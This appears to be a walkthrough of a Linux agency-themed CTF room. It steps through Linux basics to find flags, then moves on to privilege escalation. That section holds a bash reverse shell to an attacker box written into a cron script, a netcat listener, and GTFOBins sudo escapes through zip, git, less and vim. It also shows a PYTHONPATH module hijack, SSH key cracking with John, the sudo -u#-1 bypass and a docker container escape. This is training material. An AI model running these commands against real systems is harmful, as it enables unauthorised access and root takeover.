Let’s just jump in
Flag format is username{md5sum} Based on the information provided, the entiere flag is the password for next questions.
Linux Fundamentals
Mission 1
Connect on ssh with provided SSH username & password and check the MOTD to foudn the first flag.
Mission 2
Switch user from agent47 to mission 1 and list files from mission1’s home directory (/home/mission1)
Mission 3
Switch user to mission2 and list files. You will found a file call flag.txt. Read the content with cat flag.txt
Mission 4
Switch user to mission3 and list files on home directory. Again we found another flag.txt. Open the file with cat flag.txt This file tell us thats the flag is stolen by a thief. Try to edit the file with vi flag.txt and we found the graal.
Mission 5
Switch user to mission4 and list files on home directory. We found a folder named flag.
1
2
cd flag
cat flag.txt
Mission 6
Switch user to mission5 and list files on home directory. We found nothing with basic lscommand. Let’s use some ls switches to show hidden files and folders.
1
2
ls -al
cat .flag.txt
switch a is here to tell ls to show hidden files switch l is here to tell ls to print 1 line for each items (files or folders)
Mission 7
Switch user to mission6 and list files on home directory. We found nothing with basic lscommand. Let’s use some ls switches to show hidden files and folders. We found a flag folder. Enter inside it and list files with ls
1
2
3
4
ls -al
cd .flag
ls
cat flag.txt
Mission 8
Switch user to mission7 and list files on home directory. We found a file named flag.
1
cat flag.txt
Mission 9
Switch user to mission8 and list files on home directory. We found nothing even with -a switch. Let’s search the file with find command.
1
find / -name flag.txt 2> /dev/null
/ is here to specify the search scope. name allow us to specify the name of the file we are searching for. 2> /dev/null redirect the error (permissions denied for exemple) into /dev/null to avoid spaming the shell.
Let’s open the file we found with cat /flag.txt
Mission 10
Switch user to mission9 and list files on home directory. We found only a file rockyou.txt. If you check the size, you can see that it’s a big file and let’s try to grep a flag pattern to see if the flag is hidden inside.
1
cat rockyou.txt | grep -i "mission10{"
and magic appear.
Mission 11
Switch user to mission10 and list files on home directory. We found a folder and inside another set of folders and inside again a set of folders. Let’s try a search to find the flag.
1
find -name flag.txt
Let’s open the file found inside the set of random folder.
Mission 12
Switch user to mission11 and list files on home directory. We found nothing. Let’s try with hidden files and folders. Nothing special to see. Try to open the hidden files like cat .bashrc and we found that there i a special environment variable inside named flag with a command associated. You can show the environment variable named flag.
1
$flag
Mission 13
Switch user to mission12 and list files on home directory. We found a flag.txt file. Try to open it and we receive a permission denied. Let see the permission of this files with ls -al No permissions are existing on this file but owner of the file is mission12 user. Let’s update the permission and retry to open the file.
1
2
chmod +r flag.txt
cat flag.txt
Mission 14
Switch user to mission13 and list files on home directory. We found a flag.txt file. We open it and we receive an encoded string. We can regognize a base64 encoding based on the pattern. Let’s try to found the content without encoding.
1
cat flag.txt | base64 -d
Mission 15
Switch user to mission14 and list files on home directory. We found a flag.txt file. We open it and we receive an encoded string. We can regognize a binary encoding based on the pattern. Let’s try to found the content without encoding using CyberChef website with From Binary recipe.
1
cat flag.txt
Mission 16
Switch user to mission15 and list files on home directory. We found a flag.txt file. We open it and we receive an encoded string. We can regognize an hex encoding based on the pattern. Let’s try to found the content without encoding using CyberChef website with From Hex recipe.
1
cat flag.txt
Mission 17
Switch user to mission16 and list files on home directory. We found a flag file. Looks like a binary file. Let’s update the permission and execute it.
1
2
chmod +x flag
./flag
Mission 18
Switch user to mission17 and list files on home directory. We found a flag.java file. Look inside and it’s confirmed that it’s a java code. Let’s compile it.
1
javac flag.java
And then execute the result of the compilation to have the result.
1
java flag
Mission 19
Switch user to mission18 and list files on home directory. We found a flag.rb file. Look inside and it’s confirmed that it’s a ruby code. Ruby does not need compilation. Execute the code file to have the result.
1
ruby flag.rb
Mission 20
Switch user to mission19 and list files on home directory. We found a flag.c file. Look inside and it’s confirmed that it’s a C code. Let’s compile the code with gcc.
1
gcc flag.c
Ignore the warning result of the compilation. Then, execute the result of the compilation to have the result.
1
./a.out
Mission21
Switch user to mission20 and list files on home directory. We found a flag.py file. Look inside and it’s confirmed that it’s a Python code. Python does not need compilation. Execute the code file to have the result.
1
python flag.py
Mission 22
Switch user to mission21 and we obtain a limited shell. Try to list files on home directorybut found nothing. Let’s try to reopen a more conveniant shell.
1
/bin/bash
And we receive a new flag.
Mission 23
Switch user to mission22 and we obtain a python shell. Let’s try to escape and load a bash shell.
1
import pty;pty.spawn-"/bin/bash");
This code allow us to have a shell bash available. Let’s go to home directory and list files. Then open flag.txt.
Mission 24
Switch user to mission23 and list files on home directory. We found a message.txt file. Try to open it to receive hint.
1
2
3
cat message.txt
The hosts will help you.
[OPTIONAL] Maybe you will need curly hairs
Try to open hosts file with cat /etc/hosts. We see a dns alias for localhost on mission24.com website. Let’s try to access with curl
1
curl mission24.com | grep 'mission24'
Mission 25
Switch user to mission24 and list files on home directory. We found an executable named bride. We found nothing at the execution level. In the list of files, you also have a .viminfo file. This file is responsible to list all the change done in vim.
1
cat .viminfo | grep mission
Mission 26
Switch user to mission25 and list files on home directory. We reveice an error from bash:
1
bash: ls: No such file or directory
We have the same error for all standard linux command (cat, locate, …) check if PATH variable is set:
1
echo $PATH
We have no answer, which confirm that the issue is due to a missing path.
1
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Now, you can list file and you will find a flag.txt file which have the flag
1
cat flag.txt
Mission 27
Switch user to mission26 and list files on home directory. We see a flag.jpg file. Let’s try to see if we can found the flags with strings.
1
2
3
strings -n 20 flag.jpg
or
strings flag.jpg | grep "mission"
-n 20 allow us to show only line with more than 20 bytes
Mission 28
Swith user to mission27 and list files on home directory. We found a file with a lot of extensions one after the others. Let’s try to identify the real type of the files.
1
file flag.<ext>.gz
The answer say that it’s a gzip compressed data. Try to apply less command on the zip file.
1
less flag.<ext>.gz
Mission 29
Switch user to mission28. We receive a ruby shell instead of bash. Let’s escape this ruby shell and execute a bash shell.
1
exec '/bin/bash'
Then, list files on home directory. We identify a txt.galf, let’s try to open it and see what is inside.
1
cat txt.galf
we identify that it’s the flag but not in the correct order, let’s reverse it.
1
cat txt.galf | rev
Mission 30
Swith user to mission29 and list files on home directory. We found a folder bludit which looks like a web application. Let’s try to grep the flag based on the pattern:
1
grep -r mission30 bludit/
-r flag tell grep to execute the grep in all folders inside bludit/
Viktor
Switch user to mission30 and list files on home directory. We found a folder Escalator with source code inside.
1
cat sources.py
This is only a printf line without interresting information. Let’s try to see if there is hidden files (ls -al) inside this folder and we find a git folder which indicates that Escalatoris a git folder.
1
git log
log show some logs about recent commit and bingo we have a flag.
Privilege Escalation
Dalia
Switch user to Viktor and list files on home directory but nothing interresting. After a reconnaissance, we identify that there is a crontab (cat /etc/crontab) executed by dalia which is accessible by viktor. Let’s try to execute a reverse shell inside this script to receive dalia’s flag.
Create a file with a reverse shell
1
2
#!/bin/bash
bash -i >& /dev/tcp/<attackIPbox>/1234 0>&1
As like the script creation inside crontab, let’s convert the script as base64 file and overwrite the current 47.sh scripts
1
2
cat reverse.sh | base64 -w 0
echo '<base64>' | base64 -d > /opt/scripts/47.sh
In the attack box, run a netcat listener
1
netcat -nlp 1234
With the current shell, you will be connected as dalia (id command to confirm) and a flag file is available on the home directory.
Silvio
With Dalia user, do a system reconnaissance with, for example, sudo -l This command confirm that Dalia can execute /usr/bin/zip as Silvio user. Go to GTFOBin website to check if zip executable can be used to start a new shell as Silvio user. Based on GTFOBin, execute the following command:
1
2
TF=$(mktemp -u)
sudo -u silvio /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
Then the bash is “block” but you can type command as Silvio (Confirm with id command). You can open the flag directly from here or start a new bash with python:
1
2
cat /home/silvio/flag.txt
python3 -c 'import pty;pty.spawn("/bin/bash")'
Reza
With Silvio user, do a sudo -l to check if something is interesting This command confirm that Silvio can execute /usr/bin/git as Reza user. Go to GTFOBin website to check if git executable can be used to start a new shell as Reza user. Based on GTFOBin, execute the following command:
1
2
sudo -u reza PAGER='sh -c "exec sh 0<&1"' /usr/bin/git -p help
cat /home/reza/flag.txt
Jordan
Some analysis with Reza user, a sudo -l show us that Reza can execute a specific python script as Jordan user. Try to execute it
1
sudo -u jordan /opt/scripts/Gun-Shop.py
We receive an error with a not found python module named ‘shop’ Let’s create this module and provide the path to the module at the python entry
1
2
mkdir -p /tmp/shop; echo 'import os; os.system("/bin/bash");' > /tmp/shop/shop.py
sudo -u jordan PYTHONPATH=/tmp/shop /opt/scripts/Gun-Shop.py
Then confirm that we have a shell with jordan user (id)
1
2
3
cat /home/jordan/flag.txt
irb
'galf'.reverse
Ken
With Jordan user, do a sudo -l to check if something is interesting This command confirm that Jordan can execute /usr/bin/less as Ken user. Go to GTFOBin website to check if git executable can be used to start a new shell as Ken user. Based on GTFOBin, execute the following command:
1
sudo -u ken /usr/bin/less /etc/os-release
On the current shell, start a bash with this command !/bin/bash This spawn a new bash as Ken user. Recover the flag on Ken’s home directory. cat /home/ken/flag
Sean
With Ken user, do a sudo -l to check if something is interesting This command confirm that Ken can execute /usr/bin/vim as Sean user. Go to GTFOBin website to check if git executable can be used to start a new shell as Sean user. Based on GTFOBin, execute the following command:
1
sudo -u sean /usr/bin/vim -c ':!/bin/bash'
This command spawn a shell as sean, you can confirm with id command.
1
2
sean@linuxagency:~$ id
uid=1037(sean) gid=1037(sean) groups=1037(sean),4(adm)
Sean is in the adm group, so let’s have a look inside Linux log files (cat /var/log)
1
grep -r 'sean{' /var/log 2>/dev/null
We will found sean’s flag and an interresting base64 encoding string.
Let’s decode this string
1
echo 'base64' | base64 -d
The answer is the password of penelope user. Easier to continue the analysis directly from this user if we want to take a break.
Penelope
Use the previous password to switch the user to penelope (su penelope)
1
cat /home/penelope/flag.txt
Maya
With Penelope user, list files inside Penelope’s home directory. We found a base64 binary with SUID and owned by Maya. Let’s use GTFOBins, to guess the maya flag with this SUID:
1
2
LFILE=/home/maya/flag.txt
./base64 "$LFILE" | base64 -d
Robert
Swith user to Maya (su maya) with previous flag as password. In Maya’s home directory, you will found old SSH key from robert user.
Recover the SSH key to your attack box to crack it with John Start a web server with Python on the target machine:
1
2
cd /home/maya/old_robert_ssh
python3 -m http.server 8080
On the attack box, let’s download the file and then crack with John The Ripper tools.
1
2
3
wget <target_ip>/id_rsa
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash -w=/usr/share/wordlists/rockyou.txt --format=ssh
You will have the result quickly (less than 2 minutes)
Let’s use this information to ssh as robert
1
2
su robert //does not work
ssh robert@<target_server> -i id_rsa_robert //does not work
Let’s analyze the server to found another ssh server running
1
ss -nlpt
We found a process listening on port 2222 for localhost (127.0.0.1:2222) Let’s try to connect with Robert SSH key from Maya shell (with robert previous robert passphrase)
1
ssh robert@127.0.0.1 -p 2222 -i id_rsa
List file inside Robert’s home directory. Notice that the hostname has changed on the shell. Previously we had “maya@linuxagency:~” and we now have “robert@ec96850005d6” This new hostname looks like a container environment. We can confirm with the presence of .dockerenv file at root level.
Continue target machine analysis to identify a way to escape the container. Let’s have a look on sudo version to identify if the container is vulnerable to the security bypass (CVE 2019-14287)
1
sudo --version
Sudo version used inside the container is 1.8.21p2 which is vulnerable to the exploit. Let’s try it :
1
sudo -u#-1 /bin/bash
-u is the attribute to specify a specific user #-1 provide a negative ID which is the issue with current sudo version (As negative ID does not exist he used root instead) /bin/bash is the binary we want to launch as negative user
We have a root access inside the container. This allow us to recover the user.txt flag.
1
cat /root/user.txt
Let’s try to escape from the containers to found the root flag In GTFOBins website (docker), we have a possibility to run an interractive shell to escape the container. As first action identify the image used inside the container with docker ps command and then spawn the interactive system shell outside the container.
1
2
/tmp/docker ps
/tmp/docker run -v /:/mnt --rm -it mangoman chroot /mnt sh
/tmp/docker is the docker binary location inside the container run launch a new command -v /:/mnt mount the / volume inside /mnt --rm -it for interractive session mangoman is the current (and only) image inside the container chroot /mnt sh to execute a shell command
Confirm that we are now root of the base system with id command and identify the root.txt flag with cat /root/root.txt